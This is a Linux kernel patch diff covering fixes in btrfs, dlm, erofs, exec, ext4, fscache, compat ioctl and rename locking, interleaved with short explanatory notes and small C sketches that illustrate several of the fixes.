+@@ -4689,6 +4689,8 @@ int btrfs_delete_subvolume(struct inode *dir, struct dentry *dentry)
+ 	u64 root_flags;
+ 	int ret;
+ 
++	down_write(&fs_info->subvol_sem);
++
+ 	/*
+ 	 * Don't allow to delete a subvolume with send in progress. This is
+ 	 * inside the inode lock so the error handling that has to drop the bit
+@@ -4700,25 +4702,25 @@ int btrfs_delete_subvolume(struct inode *dir, struct dentry *dentry)
+ 		btrfs_warn(fs_info,
+ 			   "attempt to delete subvolume %llu during send",
+ 			   dest->root_key.objectid);
+-		return -EPERM;
++		ret = -EPERM;
++		goto out_up_write;
+ 	}
+ 	if (atomic_read(&dest->nr_swapfiles)) {
+ 		spin_unlock(&dest->root_item_lock);
+ 		btrfs_warn(fs_info,
+ 			   "attempt to delete subvolume %llu with active swapfile",
+ 			   root->root_key.objectid);
+-		return -EPERM;
++		ret = -EPERM;
++		goto out_up_write;
+ 	}
+ 	root_flags = btrfs_root_flags(&dest->root_item);
+ 	btrfs_set_root_flags(&dest->root_item,
+ 			     root_flags | BTRFS_ROOT_SUBVOL_DEAD);
+ 	spin_unlock(&dest->root_item_lock);
+ 
+-	down_write(&fs_info->subvol_sem);
+-
+ 	ret = may_destroy_subvol(dest);
+ 	if (ret)
+-		goto out_up_write;
++		goto out_undead;
+ 
+ 	btrfs_init_block_rsv(&block_rsv, BTRFS_BLOCK_RSV_TEMP);
+ 	/*
+@@ -4728,7 +4730,7 @@ int btrfs_delete_subvolume(struct inode *dir, struct dentry *dentry)
+ 	 */
+ 	ret = btrfs_subvolume_reserve_metadata(root, &block_rsv, 5, true);
+ 	if (ret)
+-		goto out_up_write;
++		goto out_undead;
+ 
+ 	trans = btrfs_start_transaction(root, 0);
+ 	if (IS_ERR(trans)) {
+@@ -4794,15 +4796,17 @@ out_end_trans:
+ 	inode->i_flags |= S_DEAD;
+ out_release:
+ 	btrfs_subvolume_release_metadata(root, &block_rsv);
+-out_up_write:
+-	up_write(&fs_info->subvol_sem);
++out_undead:
+ 	if (ret) {
+ 		spin_lock(&dest->root_item_lock);
+ 		root_flags = btrfs_root_flags(&dest->root_item);
+ 		btrfs_set_root_flags(&dest->root_item,
+ 				root_flags & ~BTRFS_ROOT_SUBVOL_DEAD);
+ 		spin_unlock(&dest->root_item_lock);
+-	} else {
++	}
++out_up_write:
++	up_write(&fs_info->subvol_sem);
++	if (!ret) {
+ 		d_invalidate(dentry);
+ 		btrfs_prune_dentries(dest);
+ 		ASSERT(dest->send_in_progress == 0);
+@@ -5948,6 +5952,78 @@ static struct dentry *btrfs_lookup(struct inode *dir, struct dentry *dentry,
+ 	return d_splice_alias(inode, dentry);
+ }
+ 
++/*
++ * Find the highest existing sequence number in a directory and then set the
++ * in-memory index_cnt variable to the first free sequence number.
++ */
++static int btrfs_set_inode_index_count(struct btrfs_inode *inode)
++{
++	struct btrfs_root *root = inode->root;
++	struct btrfs_key key, found_key;
++	struct btrfs_path *path;
++	struct extent_buffer *leaf;
++	int ret;
++
++	key.objectid = btrfs_ino(inode);
++	key.type = BTRFS_DIR_INDEX_KEY;
++	key.offset = (u64)-1;
++
++	path = btrfs_alloc_path();
++	if (!path)
++		return -ENOMEM;
++
++	ret = btrfs_search_slot(NULL, root, &key, path, 0, 0);
++	if (ret < 0)
++		goto out;
++	/* FIXME: we should be able to handle this */
++	if (ret == 0)
++		goto out;
++	ret = 0;
++
++	if (path->slots[0] == 0) {
++		inode->index_cnt = BTRFS_DIR_START_INDEX;
++		goto out;
++	}
++
++	path->slots[0]--;
++
++	leaf = path->nodes[0];
++	btrfs_item_key_to_cpu(leaf, &found_key, path->slots[0]);
++
++	if (found_key.objectid != btrfs_ino(inode) ||
++	    found_key.type != BTRFS_DIR_INDEX_KEY) {
++		inode->index_cnt = BTRFS_DIR_START_INDEX;
++		goto out;
++	}
++
++	inode->index_cnt = found_key.offset + 1;
++out:
++	btrfs_free_path(path);
++	return ret;
++}
++
++static int btrfs_get_dir_last_index(struct btrfs_inode *dir, u64 *index)
++{
++	int ret = 0;
++
++	btrfs_inode_lock(&dir->vfs_inode, 0);
++	if (dir->index_cnt == (u64)-1) {
++		ret = btrfs_inode_delayed_dir_index_count(dir);
++		if (ret) {
++			ret = btrfs_set_inode_index_count(dir);
++			if (ret)
++				goto out;
++		}
++	}
++
++	/* index_cnt is the index number of the next new entry, so decrement it. */
++	*index = dir->index_cnt - 1;
++out:
++	btrfs_inode_unlock(&dir->vfs_inode, 0);
++
++	return ret;
++}
++
+ /*
+  * All this infrastructure exists because dir_emit can fault, and we are holding
+  * the tree lock when doing readdir.  For now just allocate a buffer and copy
+@@ -5960,10 +6036,17 @@ static struct dentry *btrfs_lookup(struct inode *dir, struct dentry *dentry,
+ static int btrfs_opendir(struct inode *inode, struct file *file)
+ {
+ 	struct btrfs_file_private *private;
++	u64 last_index;
++	int ret;
++
++	ret = btrfs_get_dir_last_index(BTRFS_I(inode), &last_index);
++	if (ret)
++		return ret;
+ 
+ 	private = kzalloc(sizeof(struct btrfs_file_private), GFP_KERNEL);
+ 	if (!private)
+ 		return -ENOMEM;
++	private->last_index = last_index;
+ 	private->filldir_buf = kzalloc(PAGE_SIZE, GFP_KERNEL);
+ 	if (!private->filldir_buf) {
+ 		kfree(private);
+@@ -5973,6 +6056,19 @@ static int btrfs_opendir(struct inode *inode, struct file *file)
+ 	return 0;
+ }
+ 
++static loff_t btrfs_dir_llseek(struct file *file, loff_t offset, int whence)
++{
++	struct btrfs_file_private *private = file->private_data;
++	int ret;
++
++	ret = btrfs_get_dir_last_index(BTRFS_I(file_inode(file)),
++				       &private->last_index);
++	if (ret)
++		return ret;
++
++	return generic_file_llseek(file, offset, whence);
++}
++
+ struct dir_entry {
+ 	u64 ino;
+ 	u64 offset;
+@@ -6030,7 +6126,8 @@ static int btrfs_real_readdir(struct file *file, struct dir_context *ctx)
+ 
+ 	INIT_LIST_HEAD(&ins_list);
+ 	INIT_LIST_HEAD(&del_list);
+-	put = btrfs_readdir_get_delayed_items(inode, &ins_list, &del_list);
++	put = btrfs_readdir_get_delayed_items(inode, private->last_index,
++					      &ins_list, &del_list);
+ 
+ again:
+ 	key.type = BTRFS_DIR_INDEX_KEY;
+@@ -6047,6 +6144,8 @@ again:
+ 			break;
+ 		if (found_key.offset < ctx->pos)
+ 			continue;
++		if (found_key.offset > private->last_index)
++			break;
+ 		if (btrfs_should_delete_dir_index(&del_list, found_key.offset))
+ 			continue;
+ 		di = btrfs_item_ptr(leaf, path->slots[0], struct btrfs_dir_item);
+@@ -6182,57 +6281,6 @@ static int btrfs_update_time(struct inode *inode, struct timespec64 *now,
+ 	return dirty ? btrfs_dirty_inode(inode) : 0;
+ }
+ 
+-/*
+- * find the highest existing sequence number in a directory
+- * and then set the in-memory index_cnt variable to reflect
+- * free sequence numbers
+- */
+-static int btrfs_set_inode_index_count(struct btrfs_inode *inode)
+-{
+-	struct btrfs_root *root = inode->root;
+-	struct btrfs_key key, found_key;
+-	struct btrfs_path *path;
+-	struct extent_buffer *leaf;
+-	int ret;
+-
+-	key.objectid = btrfs_ino(inode);
+-	key.type = BTRFS_DIR_INDEX_KEY;
+-	key.offset = (u64)-1;
+-
+-	path = btrfs_alloc_path();
+-	if (!path)
+-		return -ENOMEM;
+-
+-	ret = btrfs_search_slot(NULL, root, &key, path, 0, 0);
+-	if (ret < 0)
+-		goto out;
+-	/* FIXME: we should be able to handle this */
+-	if (ret == 0)
+-		goto out;
+-	ret = 0;
+-
+-	if (path->slots[0] == 0) {
+-		inode->index_cnt = BTRFS_DIR_START_INDEX;
+-		goto out;
+-	}
+-
+-	path->slots[0]--;
+-
+-	leaf = path->nodes[0];
+-	btrfs_item_key_to_cpu(leaf, &found_key, path->slots[0]);
+-
+-	if (found_key.objectid != btrfs_ino(inode) ||
+-	    found_key.type != BTRFS_DIR_INDEX_KEY) {
+-		inode->index_cnt = BTRFS_DIR_START_INDEX;
+-		goto out;
+-	}
+-
+-	inode->index_cnt = found_key.offset + 1;
+-out:
+-	btrfs_free_path(path);
+-	return ret;
+-}
+-
+ /*
+  * helper to find a free sequence number in a given directory.  This current
+  * code is very simple, later versions will do smarter things in the btree
+@@ -11401,7 +11449,7 @@ static const struct inode_operations btrfs_dir_inode_operations = {
+ };
+ 
+ static const struct file_operations btrfs_dir_file_operations = {
+-	.llseek		= generic_file_llseek,
++	.llseek		= btrfs_dir_llseek,
+ 	.read		= generic_read_dir,
+ 	.iterate_shared	= btrfs_real_readdir,
+ 	.open		= btrfs_opendir,
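[Tying the btrfs readdir hunks together: btrfs_opendir() and btrfs_dir_llseek() snapshot the highest directory index, and both the delayed-items walk and the on-disk walk stop past that snapshot, so entries created during an in-progress readdir are not emitted by that pass. A conceptual sketch of the bound, with hypothetical types rather than kernel code.]

#include <stdint.h>
#include <stdbool.h>

struct dir_cursor {
	uint64_t pos;         /* next index to emit (ctx->pos) */
	uint64_t last_index;  /* snapshot: highest index at open time */
};

static bool emit_entry(struct dir_cursor *c, uint64_t found_index)
{
	if (found_index < c->pos)
		return true;            /* already consumed, keep scanning */
	if (found_index > c->last_index)
		return false;           /* created after open: stop here */
	c->pos = found_index + 1;       /* hand entry to userspace, advance */
	return true;
}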
+diff --git a/fs/btrfs/ioctl.c b/fs/btrfs/ioctl.c
+index e8e4781c48a50..8516c70b5edc1 100644
+--- a/fs/btrfs/ioctl.c
++++ b/fs/btrfs/ioctl.c
+@@ -780,6 +780,9 @@ static int create_snapshot(struct btrfs_root *root, struct inode *dir,
+ 		return -EOPNOTSUPP;
+ 	}
+ 
++	if (btrfs_root_refs(&root->root_item) == 0)
++		return -ENOENT;
++
+ 	if (!test_bit(BTRFS_ROOT_SHAREABLE, &root->state))
+ 		return -EINVAL;
+ 
+@@ -3500,6 +3503,10 @@ static int btrfs_ioctl_defrag(struct file *file, void __user *argp)
+ 				ret = -EFAULT;
+ 				goto out;
+ 			}
++			if (range.flags & ~BTRFS_DEFRAG_RANGE_FLAGS_SUPP) {
++				ret = -EOPNOTSUPP;
++				goto out;
++			}
+ 			/* compression requires us to start the IO */
+ 			if ((range.flags & BTRFS_DEFRAG_RANGE_COMPRESS)) {
+ 				range.flags |= BTRFS_DEFRAG_RANGE_START_IO;
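[The defrag ioctl check above follows the usual pattern for forward-compatible flag validation: any bit outside the kernel's supported mask fails with EOPNOTSUPP rather than being silently ignored. Reduced to a standalone sketch with illustrative names.]

#include <errno.h>
#include <stdint.h>

#define FLAG_COMPRESS   1u
#define FLAG_START_IO   2u
#define FLAGS_SUPPORTED (FLAG_COMPRESS | FLAG_START_IO)

static int check_flags(uint32_t flags)
{
	if (flags & ~FLAGS_SUPPORTED)   /* unknown bit set by userspace */
		return -EOPNOTSUPP;
	return 0;
}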
+diff --git a/fs/btrfs/ref-verify.c b/fs/btrfs/ref-verify.c
+index 4b052d4009d31..8083fe866d2b4 100644
+--- a/fs/btrfs/ref-verify.c
++++ b/fs/btrfs/ref-verify.c
+@@ -883,8 +883,10 @@ int btrfs_ref_tree_mod(struct btrfs_fs_info *fs_info,
+ out_unlock:
+ 	spin_unlock(&fs_info->ref_verify_lock);
+ out:
+-	if (ret)
++	if (ret) {
++		btrfs_free_ref_cache(fs_info);
+ 		btrfs_clear_opt(fs_info->mount_opt, REF_VERIFY);
++	}
+ 	return ret;
+ }
+ 
+@@ -1015,8 +1017,8 @@ int btrfs_build_ref_tree(struct btrfs_fs_info *fs_info)
+ 		}
+ 	}
+ 	if (ret) {
+-		btrfs_clear_opt(fs_info->mount_opt, REF_VERIFY);
+ 		btrfs_free_ref_cache(fs_info);
++		btrfs_clear_opt(fs_info->mount_opt, REF_VERIFY);
+ 	}
+ 	btrfs_free_path(path);
+ 	return ret;
+diff --git a/fs/btrfs/sysfs.c b/fs/btrfs/sysfs.c
+index 74fef1f49c358..fc468d1079c2e 100644
+--- a/fs/btrfs/sysfs.c
++++ b/fs/btrfs/sysfs.c
+@@ -1704,6 +1704,10 @@ static ssize_t btrfs_devinfo_scrub_speed_max_store(struct kobject *kobj,
+ 	unsigned long long limit;
+ 
+ 	limit = memparse(buf, &endptr);
++	/* There could be a trailing '\n'; also catch any typos after the value. */
++	endptr = skip_spaces(endptr);
++	if (*endptr != 0)
++		return -EINVAL;
+ 	WRITE_ONCE(device->scrub_speed_max, limit);
+ 	return len;
+ }
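[The scrub_speed_max fix above tightens sysfs input parsing: tolerate the trailing newline that echo(1) appends, reject anything else. The same idea in userspace C, with strtoull standing in for the kernel's memparse (which additionally understands k/m/g suffixes).]

#include <ctype.h>
#include <errno.h>
#include <stdlib.h>

static int parse_limit(const char *buf, unsigned long long *out)
{
	char *endptr;
	unsigned long long v = strtoull(buf, &endptr, 0);

	while (isspace((unsigned char)*endptr))  /* tolerate trailing '\n' */
		endptr++;
	if (*endptr != '\0')                     /* anything else is a typo */
		return -EINVAL;
	*out = v;
	return 0;
}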
+diff --git a/fs/btrfs/tree-checker.c b/fs/btrfs/tree-checker.c
+index 2b39c7f9226fe..02e8398246ae5 100644
+--- a/fs/btrfs/tree-checker.c
++++ b/fs/btrfs/tree-checker.c
+@@ -1399,7 +1399,7 @@ static int check_extent_item(struct extent_buffer *leaf,
+ 		if (unlikely(ptr + btrfs_extent_inline_ref_size(inline_type) > end)) {
+ 			extent_err(leaf, slot,
+ "inline ref item overflows extent item, ptr %lu iref size %u end %lu",
+-				   ptr, inline_type, end);
++				   ptr, btrfs_extent_inline_ref_size(inline_type), end);
+ 			return -EUCLEAN;
+ 		}
+ 
+diff --git a/fs/dlm/lowcomms.c b/fs/dlm/lowcomms.c
+index 6ed09edabea0c..72f34f96d0155 100644
+--- a/fs/dlm/lowcomms.c
++++ b/fs/dlm/lowcomms.c
+@@ -1845,8 +1845,8 @@ static int dlm_tcp_bind(struct socket *sock)
+ 	memcpy(&src_addr, dlm_local_addr[0], sizeof(src_addr));
+ 	make_sockaddr(&src_addr, 0, &addr_len);
+ 
+-	result = sock->ops->bind(sock, (struct sockaddr *)&src_addr,
+-				 addr_len);
++	result = kernel_bind(sock, (struct sockaddr *)&src_addr,
++			     addr_len);
+ 	if (result < 0) {
+ 		/* This *may* not indicate a critical error */
+ 		log_print("could not bind for connect: %d", result);
+@@ -1860,7 +1860,7 @@ static int dlm_tcp_connect(struct connection *con, struct socket *sock,
+ {
+ 	int ret;
+ 
+-	ret = sock->ops->connect(sock, addr, addr_len, O_NONBLOCK);
++	ret = kernel_connect(sock, addr, addr_len, O_NONBLOCK);
+ 	switch (ret) {
+ 	case -EINPROGRESS:
+ 		fallthrough;
+@@ -1900,8 +1900,8 @@ static int dlm_tcp_listen_bind(struct socket *sock)
+ 
+ 	/* Bind to our port */
+ 	make_sockaddr(dlm_local_addr[0], dlm_config.ci_tcp_port, &addr_len);
+-	return sock->ops->bind(sock, (struct sockaddr *)dlm_local_addr[0],
+-			       addr_len);
++	return kernel_bind(sock, (struct sockaddr *)&dlm_local_addr[0],
++			   addr_len);
+ }
+ 
+ static const struct dlm_proto_ops dlm_tcp_ops = {
+@@ -1928,12 +1928,12 @@ static int dlm_sctp_connect(struct connection *con, struct socket *sock,
+ 	int ret;
+ 
+ 	/*
+-	 * Make sock->ops->connect() function return in specified time,
++	 * Make kernel_connect() function return in specified time,
+ 	 * since O_NONBLOCK argument in connect() function does not work here,
+ 	 * then, we should restore the default value of this attribute.
+ 	 */
+ 	sock_set_sndtimeo(sock->sk, 5);
+-	ret = sock->ops->connect(sock, addr, addr_len, 0);
++	ret = kernel_connect(sock, addr, addr_len, 0);
+ 	sock_set_sndtimeo(sock->sk, 0);
+ 	if (ret < 0)
+ 		return ret;
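[The dlm_sctp_connect() comment above describes bounding a blocking connect with a send timeout, because O_NONBLOCK is ineffective there. The same trick expressed against the userspace socket API, as a sketch; the 5-second value mirrors the hunk and setsockopt error handling is elided.]

#include <sys/socket.h>
#include <sys/time.h>

static int connect_with_timeout(int fd, const struct sockaddr *addr,
				socklen_t alen, int seconds)
{
	struct timeval tv  = { .tv_sec = seconds };
	struct timeval off = { 0 };    /* 0 = restore "block forever" */
	int ret;

	setsockopt(fd, SOL_SOCKET, SO_SNDTIMEO, &tv, sizeof(tv));
	ret = connect(fd, addr, alen);
	setsockopt(fd, SOL_SOCKET, SO_SNDTIMEO, &off, sizeof(off));
	return ret;
}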
+diff --git a/fs/erofs/decompressor.c b/fs/erofs/decompressor.c
+index 51b7ac7166d96..0cfad74374ca9 100644
+--- a/fs/erofs/decompressor.c
++++ b/fs/erofs/decompressor.c
+@@ -122,11 +122,11 @@ static int z_erofs_lz4_prepare_dstpages(struct z_erofs_lz4_decompress_ctx *ctx,
+ }
+ 
+ static void *z_erofs_lz4_handle_overlap(struct z_erofs_lz4_decompress_ctx *ctx,
+-			void *inpage, unsigned int *inputmargin, int *maptype,
+-			bool may_inplace)
++			void *inpage, void *out, unsigned int *inputmargin,
++			int *maptype, bool may_inplace)
+ {
+ 	struct z_erofs_decompress_req *rq = ctx->rq;
+-	unsigned int omargin, total, i, j;
++	unsigned int omargin, total, i;
+ 	struct page **in;
+ 	void *src, *tmp;
+ 
+@@ -136,20 +136,20 @@ static void *z_erofs_lz4_handle_overlap(struct z_erofs_lz4_decompress_ctx *ctx,
+ 		    omargin < LZ4_DECOMPRESS_INPLACE_MARGIN(rq->inputsize))
+ 			goto docopy;
+ 
+-		for (i = 0; i < ctx->inpages; ++i) {
+-			DBG_BUGON(rq->in[i] == NULL);
+-			for (j = 0; j < ctx->outpages - ctx->inpages + i; ++j)
+-				if (rq->out[j] == rq->in[i])
+-					goto docopy;
+-		}
++		for (i = 0; i < ctx->inpages; ++i)
++			if (rq->out[ctx->outpages - ctx->inpages + i] !=
++			    rq->in[i])
++				goto docopy;
++		kunmap_local(inpage);
++		*maptype = 3;
++		return out + ((ctx->outpages - ctx->inpages) << PAGE_SHIFT);
+ 	}
+ 
+ 	if (ctx->inpages <= 1) {
+ 		*maptype = 0;
+ 		return inpage;
+ 	}
+-	kunmap_atomic(inpage);
+-	might_sleep();
++	kunmap_local(inpage);
+ 	src = erofs_vm_map_ram(rq->in, ctx->inpages);
+ 	if (!src)
+ 		return ERR_PTR(-ENOMEM);
+@@ -162,7 +162,7 @@ docopy:
+ 	src = erofs_get_pcpubuf(ctx->inpages);
+ 	if (!src) {
+ 		DBG_BUGON(1);
+-		kunmap_atomic(inpage);
++		kunmap_local(inpage);
+ 		return ERR_PTR(-EFAULT);
+ 	}
+ 
+@@ -173,9 +173,9 @@ docopy:
+ 			min_t(unsigned int, total, PAGE_SIZE - *inputmargin);
+ 
+ 		if (!inpage)
+-			inpage = kmap_atomic(*in);
++			inpage = kmap_local_page(*in);
+ 		memcpy(tmp, inpage + *inputmargin, page_copycnt);
+-		kunmap_atomic(inpage);
++		kunmap_local(inpage);
+ 		inpage = NULL;
+ 		tmp += page_copycnt;
+ 		total -= page_copycnt;
+@@ -205,16 +205,16 @@ int z_erofs_fixup_insize(struct z_erofs_decompress_req *rq, const char *padbuf,
+ }
+ 
+ static int z_erofs_lz4_decompress_mem(struct z_erofs_lz4_decompress_ctx *ctx,
+-				      u8 *out)
++				      u8 *dst)
+ {
+ 	struct z_erofs_decompress_req *rq = ctx->rq;
+ 	bool support_0padding = false, may_inplace = false;
+ 	unsigned int inputmargin;
+-	u8 *headpage, *src;
++	u8 *out, *headpage, *src;
+ 	int ret, maptype;
+ 
+ 	DBG_BUGON(*rq->in == NULL);
+-	headpage = kmap_atomic(*rq->in);
++	headpage = kmap_local_page(*rq->in);
+ 
+ 	/* LZ4 decompression inplace is only safe if zero_padding is enabled */
+ 	if (erofs_sb_has_zero_padding(EROFS_SB(rq->sb))) {
+@@ -223,7 +223,7 @@ static int z_erofs_lz4_decompress_mem(struct z_erofs_lz4_decompress_ctx *ctx,
+ 				min_t(unsigned int, rq->inputsize,
+ 				      EROFS_BLKSIZ - rq->pageofs_in));
+ 		if (ret) {
+-			kunmap_atomic(headpage);
++			kunmap_local(headpage);
+ 			return ret;
+ 		}
+ 		may_inplace = !((rq->pageofs_in + rq->inputsize) &
+@@ -231,11 +231,12 @@ static int z_erofs_lz4_decompress_mem(struct z_erofs_lz4_decompress_ctx *ctx,
+ 	}
+ 
+ 	inputmargin = rq->pageofs_in;
+-	src = z_erofs_lz4_handle_overlap(ctx, headpage, &inputmargin,
++	src = z_erofs_lz4_handle_overlap(ctx, headpage, dst, &inputmargin,
+ 					 &maptype, may_inplace);
+ 	if (IS_ERR(src))
+ 		return PTR_ERR(src);
+ 
++	out = dst + rq->pageofs_out;
+ 	/* legacy format could compress extra data in a pcluster. */
+ 	if (rq->partial_decoding || !support_0padding)
+ 		ret = LZ4_decompress_safe_partial(src + inputmargin, out,
+@@ -261,12 +262,12 @@ static int z_erofs_lz4_decompress_mem(struct z_erofs_lz4_decompress_ctx *ctx,
+ 	}
+ 
+ 	if (maptype == 0) {
+-		kunmap_atomic(headpage);
++		kunmap_local(headpage);
+ 	} else if (maptype == 1) {
+ 		vm_unmap_ram(src, ctx->inpages);
+ 	} else if (maptype == 2) {
+ 		erofs_put_pcpubuf(src);
+-	} else {
++	} else if (maptype != 3) {
+ 		DBG_BUGON(1);
+ 		return -EFAULT;
+ 	}
+@@ -289,7 +290,7 @@ static int z_erofs_lz4_decompress(struct z_erofs_decompress_req *rq,
+ 	/* one optimized fast path only for non bigpcluster cases yet */
+ 	if (ctx.inpages == 1 && ctx.outpages == 1 && !rq->inplace_io) {
+ 		DBG_BUGON(!*rq->out);
+-		dst = kmap_atomic(*rq->out);
++		dst = kmap_local_page(*rq->out);
+ 		dst_maptype = 0;
+ 		goto dstmap_out;
+ 	}
+@@ -309,9 +310,9 @@ static int z_erofs_lz4_decompress(struct z_erofs_decompress_req *rq,
+ 	}
+ 
+ dstmap_out:
+-	ret = z_erofs_lz4_decompress_mem(&ctx, dst + rq->pageofs_out);
++	ret = z_erofs_lz4_decompress_mem(&ctx, dst);
+ 	if (!dst_maptype)
+-		kunmap_atomic(dst);
++		kunmap_local(dst);
+ 	else if (dst_maptype == 2)
+ 		vm_unmap_ram(dst, ctx.outpages);
+ 	return ret;
+diff --git a/fs/exec.c b/fs/exec.c
+index 283012eb1aeb9..39f7751c90fc3 100644
+--- a/fs/exec.c
++++ b/fs/exec.c
+@@ -1410,6 +1410,9 @@ int begin_new_exec(struct linux_binprm * bprm)
+ 
+ out_unlock:
+ 	up_write(&me->signal->exec_update_lock);
++	if (!bprm->cred)
++		mutex_unlock(&me->signal->cred_guard_mutex);
++
+ out:
+ 	return retval;
+ }
+diff --git a/fs/ext4/mballoc.c b/fs/ext4/mballoc.c
+index a6e41746890d4..33be702d6e380 100644
+--- a/fs/ext4/mballoc.c
++++ b/fs/ext4/mballoc.c
+@@ -6421,11 +6421,16 @@ __acquires(bitlock)
+ static ext4_grpblk_t ext4_last_grp_cluster(struct super_block *sb,
+ 					   ext4_group_t grp)
+ {
+-	if (grp < ext4_get_groups_count(sb))
+-		return EXT4_CLUSTERS_PER_GROUP(sb) - 1;
+-	return (ext4_blocks_count(EXT4_SB(sb)->s_es) -
+-		ext4_group_first_block_no(sb, grp) - 1) >>
+-					EXT4_CLUSTER_BITS(sb);
++	unsigned long nr_clusters_in_group;
++
++	if (grp < (ext4_get_groups_count(sb) - 1))
++		nr_clusters_in_group = EXT4_CLUSTERS_PER_GROUP(sb);
++	else
++		nr_clusters_in_group = (ext4_blocks_count(EXT4_SB(sb)->s_es) -
++					ext4_group_first_block_no(sb, grp))
++				       >> EXT4_CLUSTER_BITS(sb);
++
++	return nr_clusters_in_group - 1;
+ }
+ 
+ static bool ext4_trim_interrupted(void)
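[For the ext4_last_grp_cluster() rewrite above, a worked example with made-up geometry: every group but the last holds EXT4_CLUSTERS_PER_GROUP clusters, while the last group holds only the blocks remaining past its first block; either way the function returns count - 1.]

#include <stdio.h>

int main(void)
{
	unsigned long long blocks_count = 1000000; /* total fs blocks (hypothetical) */
	unsigned long long group_first  = 991232;  /* first block of the last group */
	unsigned int cluster_bits = 0;             /* 1 block per cluster */

	unsigned long long nr_clusters =
		(blocks_count - group_first) >> cluster_bits;

	/* Prints: last cluster index in final group: 8767 */
	printf("last cluster index in final group: %llu\n", nr_clusters - 1);
	return 0;
}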
+diff --git a/fs/fscache/cache.c b/fs/fscache/cache.c
+index d645f8b302a27..9397ed39b0b4e 100644
+--- a/fs/fscache/cache.c
++++ b/fs/fscache/cache.c
+@@ -179,13 +179,14 @@ EXPORT_SYMBOL(fscache_acquire_cache);
+ void fscache_put_cache(struct fscache_cache *cache,
+ 		       enum fscache_cache_trace where)
+ {
+-	unsigned int debug_id = cache->debug_id;
++	unsigned int debug_id;
+ 	bool zero;
+ 	int ref;
+ 
+ 	if (IS_ERR_OR_NULL(cache))
+ 		return;
+ 
++	debug_id = cache->debug_id;
+ 	zero = __refcount_dec_and_test(&cache->ref, &ref);
+ 	trace_fscache_cache(debug_id, ref - 1, where);
+ 
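[The fscache_put_cache() fix above is a small but classic ordering bug: the local initializer dereferenced cache before the IS_ERR_OR_NULL() guard ran. The pattern, reduced to a minimal sketch with hypothetical types.]

struct cache { unsigned int debug_id; };

unsigned int put_cache_fixed(struct cache *cache)
{
	unsigned int debug_id;

	if (!cache)                      /* guard runs first ...          */
		return 0;
	debug_id = cache->debug_id;      /* ... the read happens after it */
	return debug_id;
}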
+diff --git a/fs/ioctl.c b/fs/ioctl.c
+index 80ac36aea913b..2bd05509295ac 100644
+--- a/fs/ioctl.c
++++ b/fs/ioctl.c
+@@ -916,8 +916,7 @@ COMPAT_SYSCALL_DEFINE3(ioctl, unsigned int, fd, unsigned int, cmd,
+ 	if (!f.file)
+ 		return -EBADF;
+ 
+-	/* RED-PEN how should LSM module know it's handling 32bit? */
+-	error = security_file_ioctl(f.file, cmd, arg);
++	error = security_file_ioctl_compat(f.file, cmd, arg);
+ 	if (error)
+ 		goto out;
+ 
+diff --git a/fs/namei.c b/fs/namei.c
+index b5578f4ce5d6e..9e336b408ed17 100644
+--- a/fs/namei.c
++++ b/fs/namei.c
+@@ -3017,20 +3017,14 @@ static struct dentry *lock_two_directories(struct dentry *p1, struct dentry *p2)
+ 	p = d_ancestor(p2, p1);
+ 	if (p) {
+ 		inode_lock_nested(p2->d_inode, I_MUTEX_PARENT);
+-		inode_lock_nested(p1->d_inode, I_MUTEX_CHILD);
++		inode_lock_nested(p1->d_inode, I_MUTEX_PARENT2);
+ 		return p;
+ 	}
+ 
+ 	p = d_ancestor(p1, p2);
+-	if (p) {
+-		inode_lock_nested(p1->d_inode, I_MUTEX_PARENT);
+-		inode_lock_nested(p2->d_inode, I_MUTEX_CHILD);
+-		return p;
+-	}
+-
+-	lock_two_inodes(p1->d_inode, p2->d_inode,
+-			I_MUTEX_PARENT, I_MUTEX_PARENT2);
+-	return NULL;
++	inode_lock_nested(p1->d_inode, I_MUTEX_PARENT);
++	inode_lock_nested(p2->d_inode, I_MUTEX_PARENT2);
++	return p;
+ }
+ 
+ /*
+@@ -4735,11 +4729,12 @@ SYSCALL_DEFINE2(link, const char __user *, oldname, const char __user *, newname
+  *
+  *	a) we can get into loop creation.
+  *	b) race potential - two innocent renames can create a loop together.
+- *	   That's where 4.4 screws up. Current fix: serialization on
++ *	   That's where 4.4BSD screws up. Current fix: serialization on
+  *	   sb->s_vfs_rename_mutex. We might be more accurate, but that's another
+  *	   story.
+- *	c) we have to lock _four_ objects - parents and victim (if it exists),
+- *	   and source.
++ *	c) we may have to lock up to _four_ objects - parents and victim (if it exists),
++ *	   and source (if it's a non-directory or a subdirectory that moves to
++ *	   a different parent).
+  *	   And that - after we got ->i_mutex on parents (until then we don't know
+  *	   whether the target exists).  Solution: try to be smart with locking
+  *	   order for inodes.  We rely on the fact that tree topology may change
+@@ -4771,6 +4766,7 @@ int vfs_rename(struct renamedata *rd)
+ 	bool new_is_dir = false;
+ 	unsigned max_links = new_dir->i_sb->s_max_links;
+ 	struct name_snapshot old_name;
++	bool lock_old_subdir, lock_new_subdir;
+ 
+ 	if (source == target)
+ 		return 0;
+@@ -4824,15 +4820,32 @@ int vfs_rename(struct renamedata *rd)
+ 	take_dentry_name_snapshot(&old_name, old_dentry);
+ 	dget(new_dentry);
+ 	/*
+-	 * Lock all moved children. Moved directories may need to change parent
+-	 * pointer so they need the lock to prevent against concurrent
+-	 * directory changes moving parent pointer. For regular files we've
+-	 * historically always done this. The lockdep locking subclasses are
+-	 * somewhat arbitrary but RENAME_EXCHANGE in particular can swap
+-	 * regular files and directories so it's difficult to tell which
+-	 * subclasses to use.
++	 * Lock children.
++	 * The source subdirectory needs to be locked on cross-directory
++	 * rename or cross-directory exchange since its parent changes.
++	 * The target subdirectory needs to be locked on cross-directory
++	 * exchange due to parent change and on any rename due to becoming
++	 * a victim.
++	 * Non-directories need locking in all cases (for NFS reasons);
++	 * they get locked after any subdirectories (in inode address order).
++	 *
++	 * NOTE: WE ONLY LOCK UNRELATED DIRECTORIES IN CROSS-DIRECTORY CASE.
++	 * NEVER, EVER DO THAT WITHOUT ->s_vfs_rename_mutex.
+ 	 */
+-	lock_two_inodes(source, target, I_MUTEX_NORMAL, I_MUTEX_NONDIR2);
++	lock_old_subdir = new_dir != old_dir;
++	lock_new_subdir = new_dir != old_dir || !(flags & RENAME_EXCHANGE);
++	if (is_dir) {
++		if (lock_old_subdir)
++			inode_lock_nested(source, I_MUTEX_CHILD);
++		if (target && (!new_is_dir || lock_new_subdir))
++			inode_lock(target);
++	} else if (new_is_dir) {
++		if (lock_new_subdir)
++			inode_lock_nested(target, I_MUTEX_CHILD);
++		inode_lock(source);
++	} else {
++		lock_two_nondirectories(source, target);
++	}
+ 
+ 	error = -EPERM;
+ 	if (IS_SWAPFILE(source) || (target && IS_SWAPFILE(target)))
